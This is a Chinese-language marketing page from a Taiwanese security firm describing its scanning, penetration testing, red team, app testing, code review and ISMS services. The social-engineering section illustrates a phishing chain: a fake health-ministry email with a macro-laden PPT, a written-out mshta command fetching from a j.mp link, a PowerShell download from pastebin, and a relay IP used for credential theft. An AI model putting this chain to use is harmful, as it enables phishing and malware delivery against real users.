全方位資安服務:戰國策提供資訊安全、資安健診解決方案
戰國策365天全年無休服務專線 0800-003-191

戰國策

資安服務

資安產品組合
立即諮詢

戰國策資安服務以專業技術保護您的資源,作為一家專業資訊安全公司,戰國策資安服務致力於保護企業和個人的資源,提供多層次、全方位的安全保障。戰國策資安服務的資訊安全管理解決方案提供多項功能,包括弱點掃描服務、滲透測試服務、紅隊演練服務、資安健診服務、社交工程服務、APP檢測服務、源碼檢測服務、ISMS導入等,讓用戶能夠全面掌握自身的資安風險,針對性地進行資安強化。

資安服務

資安服務總覽

  • ISMS導入/驗證
  • 資安管理制度導入
  • 教育訓練服務
  • APP檢測
  • 資安顧問服務
  • 紅隊演練服務
  • DDoS演練服務

資安服務特色

專業團隊

我們的專家團隊具有多年的資訊安全經驗,持有國際認證,確保提供給您最專業的建議和解決方案。

客製化服務

了解到每家企業的需求都是獨特的,我們提供客製化的資安方案,確保符合您的業務需求和預算。

最新技術

我們持續追踪資訊安全的最新技術和趨勢,確保您得到最前沿的保護。

24/7監控與支援

我們的監控中心全天候運作,隨時為您偵測和應對任何安全威脅。

不論您是大型企業還是中小企業,戰國策資安服務都能為您提供最適合的資安解決方案。與我們合作,讓我們共同守護您的數位資產,確保業務持續、安全地運作。

弱點掃描服務

弱點掃描(Vulnerability Assessment, VA)指的是針對企業網站、內部伺服器或網路設備進行泛用性掃描,並發掘已知的系統弱點
接著深入探討、分析、調整並排除弱點掃描的結果報告,並以此評估企業內部環境之風險 並提供資安建議方案,確保企業之關鍵設備的安全性維持在最佳狀態、等級。最後,依照各企業單位之需求協助

STEP 01
專案啟動

專案需求確認,並完成環境檢視

STEP 02
弱點掃描

利用專案掃描工具進行遠端(或現場) 檢測

STEP 03
檢測分析

針對掃描結果進行分析

STEP 04
修正建議

綜整掃描結果及意見回復

STEP 05
專案完成

修復完畢,依單位需求評斷是否進行複測

弱點掃描

  • 分內網 / 外網執行
  • 偵測目標的系統、服務和漏洞
  • 依循國際標準進行全面性掃描
  • 發現已知漏洞、發覺不安全設定
  • 適合用以建構資安基準線

主機/伺服器

  • 使用Tenable Nessus工具
  • 針對伺服器或網路 設備進行掃描
  • 發覺已知的系統弱點及 後門程式
  • 深入分析、調整及排除 誤判狀況
  • 評估環境之風險等級
  • 提供修補建議

網站/系統

  • 使用Acunetix工具
  • OWASP TOP 10、SANS 25大弱點執行檢測
  • 發覺已知漏洞、不安全 設定
  • 提供修補建議
BACK TO TOP

滲透測試服務

滲透測試(Penetration Test, PT)為針對企業所提供之網站應用程式進行測試,確認網站安全性並設法取得存取權與內部機敏資訊。
通常依循OWASP TOP 10以及SANS TOP 20等準則設計一系列檢測流程。利用多種深入檢測工具輔助進行測試,包含SQL Injection及其他弱點檢測,並發現系統脆弱點。
最後,依照單位之檢測結果提供詳細的解決方案,持續提高客戶網站之安全等級。

STEP 01
前置準備

專案需求確認,並完成環境檢視

STEP 02
專家盲測

以專家盲測方式尋找可能弱點

STEP 03
深度滲透

利用多種工具掃描協助進行檢測

STEP 04
弱點驗證

全弱點進行誤判排除及二次驗證

STEP 05
結果評估

執行結果與整體建議

滲透測試

  • 分內網 / 外網執行
  • 以駭客思維與手法嘗試入侵目標環境
  • 找出各種潛在的漏洞
  • 彌補自動化掃描的不足
  • 提出建議的安全修正方式
  • 藉由複測確認各項漏洞修補狀況
  • 檢測注重不影響服務為主

網站/系統 & 網路環境

  • 針對網站/應用程式進行 滲透測試
  • 依循國際標準規範進行檢測
  • 設法取得存取權限與機敏資料
  • 實施隱碼檢測及其他弱點檢測
BACK TO TOP

紅隊演練服務

資安服務戰國策集團

紅隊演練 (Red Teaming) 係用以補足傳統滲透測試容易忽略之邊界防禦,以及基於 人為疏失之佈署盲點,利用公開資訊、社交網路、暗網等搜集目標情資、結合資訊安全專家之專業知識、攻防技術及駭客工具資料庫,對於雙方所約定之攻擊目標與組織,採取無所不用其極的方法進行入侵演練,同時可驗證防守方(藍隊)的偵測與回應能力

為什麼需要紅隊演練?

藉由紅隊演練過程與結果,強化組織藍隊:

  • 人員面:能否針對演練過程之告警進行回應
  • 技術面:現有防護機制能否涵蓋模擬情境之攻擊
  • 管理面:當資安事件實際發生時,內部安全營運團隊之IR流程是否完整
資安服務戰國策集團

紅隊演練涵蓋攻擊流程範圍:

資安服務戰國策集團
BACK TO TOP

資安健診服務

資安健診係依循各式標準與規範,針對客戶單位環境進行全面性的安全檢測。並檢視 客戶單位環境內各項資安防護能力,發掘不安全的設定潛在風險,持續提升企業單 位整體資安防護等級。

主要檢測目標項目包含:網路架構審視、有線網路惡意活動檢測、使用者及伺服器主 機之惡意程式檢測與更新檢視、各項安全性設定檢視。

STEP 01
專案啟動

專案需求確認,並確認執行範圍

STEP 02
資續蒐集

蒐集作業系統、應用程式、環境資訊等多項相關訊息

STEP 03
各項檢測

藉由多項工具進行深入檢測

STEP 04
資料分析

以專業知識統整分析所得結果資料

STEP 05
結果評估

綜整執行結果評估

資安健診-共同供應契約

資安服務戰國策集團
BACK TO TOP

社交工程服務

社交工程演練主要是利用測試手法配合電子郵件或簡訊的方式針對企業單位進行測試。
為了提升企業單位內部員工的資安意識以及對於受測使用者面對社交工程攻擊與惡意訊息時的防護與警覺能力。
通常會簽訂保密合約,在安全的範圍內,由服務商實施社交工程演練,提升單位員工的資安意識及對於網路安全防護之警覺性

偽裝成衛福部官員信
95.216.8.75 (寄件來源)

附件檔案為PPT
Covid-19防护措施.ppt

使用巨集載入後續內容
MSHTA mshta http://%20%20@j.mp/asda kdxassddodkasodkaos

POWERSHELL
下載並植入pastebin.com內容

回報中繼站
198.23.200.239
竊取帳號密碼
關閉資安防護

BACK TO TOP

APP檢測服務

依據OWASP MOBILE TOP 10、行動應用App基本資安檢測基準等規範,針對iOS/Android平台之App進行 檢測。
透過多種檢測工具針對App進行解譯、反編碼程序等分析,並評估其內容是否有機敏資訊洩漏或違反規範等風險。除了檢測App本身是否含有漏洞風險之外,為確認App傳輸之機敏資料確實受到保護,降低敏感資料 在行動裝置傳輸時外洩的機會。
最後,透過檢測結果產出測試報告,讓受測單位了解自身App封包傳輸的安全狀況。

STEP 01
專案啟動

專案需求確認,基本資訊填回單、 完成受測樣態檢視

STEP 02
資續蒐集

取得受測APP、判斷受測樣太完 整性、確認受測樣態版 本

STEP 03
靜態檢測

利用多種工具分析協助、原始碼解析、機敏資訊查找

STEP 04
動態檢測

執行封包攔截、分析傳輸封包內容、分析執行記錄

STEP 05
修正建議

綜整弱點與合規檢視、執行結果評估、產出服務報告

APP檢測服務 – 檢測基準

遵循經濟部工業局 (Ministry of Economic Affairs, MOEA) 於 108 年 9 月修訂 之 「 行動應用 App 基本資安檢測基準 V 3.1 」版本 。 此檢測基準參考了 OWASP MOBILE TOP 10 、 CSA MAST 及 NIST 等國際規範 為以測試並確保受 測單位之行動應用程式之安全性 。

檢測分類檢測說明
L1無須使用者身分鑑別之行動應用程式,須檢測項目為22項
L2須使用者身分鑑別之行動應用程式,須檢測之項目為25項
L3含有交易行為之行動應用程式,須檢測之項目共為30項
BACK TO TOP

源碼檢測服務

  • 原始碼檢測指的就是白箱測試,遵循OWASP TOP 10、SANS/FBI及CWE等各項國際標準 規範,針對各項主流之程式語言進行弱點掃描。
  • 透過應用系統進行整合性測試,確保傳輸連線、加密/編碼方式以及敏感資料是否已妥善防護。 避免因程式碼邏輯衝突產生安全漏洞隱憂或是避免網站及應用系統遭受攻擊、入侵。
  • 最後,再根據檢測結果提供適當的修復方案建議給客戶,確保客戶端所提供之服務能進一步 保障用戶敏感資料。
STEP 01
專案啟動

專案需求確認,並完成環境檢視

STEP 02
目標確認

分析及確認目標系統之運作狀況

STEP 03
源碼分析

利用多種工具分析對原始碼進行蒐集與分析

STEP 04
修正建議

檢視弱點並進行修正評估與優先建議

STEP 05
報告交付

正式報告產 出並完成交 付說明

BACK TO TOP

ISMS導入

驗證服務

ISMS(Information Security Management System)是一套有系統地分析與管理資訊安全風險的方法。透過制度化的控制方法,把資訊風險降低到企業可接受的程度內,以風險管理的觀念保護企業中資訊資產的機密性、完整性及可用性

透過國際標準化組織ISO(International Organization for Standardization)所發布的ISO 27001資訊安全管理框架,協助企業組織管理和保護資訊資產,確保其安全無慮。

STEP 01
現況分析與診斷
STEP 02
風險評鑑與管理
STEP 03
建立資訊安全管理系統
STEP 04
制度落實與實施稽核
STEP 05
稽核作業與驗證
BACK TO TOP

資安服務成功案例

這三個成功案例都展示了戰國策資安防護服務的效果和價值。無論是電商、金融還是科技產業,戰國策都能提供專業和全面的資安解決方案,確保企業的資訊資產得到充分保護。

某電商巨頭網站

背景:隨著線上購物的普及,某電商巨頭網站成為台灣最大的電商平台之一。每日有數百萬的交易流量,但也因此成為駭客的主要目標。

解決方案:戰國策為某電商巨頭網站提供了全面的弱點掃描服務,並進行滲透測試,模擬真實的駭客攻擊。此外,透過源碼檢測服務,確保百貨網的網站和APP無任何資安隱患。

結果:百貨網成功防範了多次的駭客攻擊,並提高了客戶的購物信心。此外,透過戰國策的資安健診服務,某電商巨頭網站持續優化其資安策略,確保交易安全。

金融機構:某銀行

背景:某銀行是台灣的主要金融機構之一,擁有龐大的客戶資料和交易紀錄。但近年來,金融業成為駭客攻擊的主要目標,某銀行亦不例外。

解決方案:戰國策為某銀行提供了紅隊演練服務,模擬真實的資安攻擊情境,測試銀行的資安防護措施和應變機制。同時,透過ISMS導入,建立完善的資訊安全管理體系。

結果:某銀行成功抵禦了多次的資安威脅,並提高了其資安管理的成熟度。客戶對銀行的信任度大幅提升,且銀行的業務運營更加順利。

某科技公司

背景:某科技是一家提供雲端解決方案的科技公司。隨著業務的擴展,公司的資料中心和雲端服務成為駭客的攻擊目標。

解決方案:戰國策為某科技提供了APP檢測服務和社交工程服務,確保公司的應用程式和員工都有足夠的資安意識和防護能力。此外,透過資安健診服務,評估公司的資安健康狀況,並提供改善建議。

結果:某科技成功避免了多次的資安及駭客事件,並提高了其雲端服務的安全性。客戶對公司的服務更加放心,業務量也有顯著的增長

若貴公司需要資安服務,歡迎致電0800-003-191或填寫以下聯絡表單或用官方 LINE (ID:@119m) 與本公司聯繫 我們的網路顧問在24小時內主動與您連繫,資料經確認無誤後,戰國策會依貴公司產業免費規劃一份網路行銷提案書,助您在網路世界稱霸!同時贈送戰國策1,000元儲值金(限企業客戶,儲值金可購買戰國策所有服務,網址註冊服務除外)

    公司名稱 (必填)

    聯絡人 (必填)

    聯絡電話 (必填)

    聯絡信箱 (必填)

    公司地址 (必填)

    目前網站網址(沒有可不填)

    想了解的服務項目

    申請試用
    0800-003-191
    用LINE與我們諮詢

    集團簡介

    最新資訊

    資安服務

    雲端服務

    網頁設計

    電子商務

    網路行銷

    經銷方案

    客服中心